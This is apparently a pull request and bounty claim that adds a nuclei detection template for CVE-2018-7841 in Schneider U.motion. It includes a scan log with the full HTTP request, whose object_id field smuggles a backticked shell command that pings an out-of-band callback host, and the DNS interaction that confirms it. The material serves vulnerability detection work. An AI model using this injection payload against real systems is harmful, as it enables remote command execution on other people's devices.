PR
Create CVE-2018-7841.yaml
projectdiscovery/nuclei-templates#12967

Template / PR Information

  • Add CVE-2018-7841

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Can provide additional details via Discord if required.

/claim #12851

[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.pro
[INF] [CVE-2018-7841] Dumped HTTP request for https://REDACTED/umotion/modules/reporting/track_import_export.php
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 104
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
op=export&language=english&interval=1&object_id=`ping -c 1 REDACTED.oast.pro`
[DBG] [CVE-2018-7841] Dumped HTTP response https://REDACTED/umotion/modules/reporting/track_import_export.php
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin,SOAPserver,SOAPaction,Method,Accept,DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE
Content-Disposition: attachment; filename="tracking_log_2025_08_24_00_12_38.csv"
Content-Type: application/octet-stream
Date: Sat, 23 Aug 2025 22:12:38 GMT
Server: nginx/1.1.19
X-Powered-By: PHP/5.4.4-4
"ID";"Object";"Period";"Timestamp";"Year";"Month";"Day";"Time";"Week";"Day of the week";"Initial value";"Final value";"Average value";"Min. value";"Max. value";"Sum";"Counter";"Difference";"Integral"
[REDACTED] Received DNS interaction from REDACTED at 2025-08-23 22:12:37
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;REDACTED.OAst.PrO. IN A
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;REDACTED.OAst.PrO. IN A
;; ANSWER SECTION:
REDACTED.OAst.PrO. 3600 IN A REDACTED
;; AUTHORITY SECTION:
REDACTED.OAst.PrO. 3600 IN NS ns1.oast.pro.
REDACTED.OAst.PrO. 3600 IN NS ns2.oast.pro.
;; ADDITIONAL SECTION:
ns1.oast.pro. 3600 IN A REDACTED
ns2.oast.pro. 3600 IN A REDACTED
[CVE-2018-7841:status-1] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-2] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-3] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[INF] Scan completed in 7.968413309s. 3 matches found.

Additional References:

Claim

Total prize pool $50
Total paid $50
Status Approved
Submitted August 23, 2025
Last updated August 23, 2025

Contributors

Chris

@darses

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$50 paid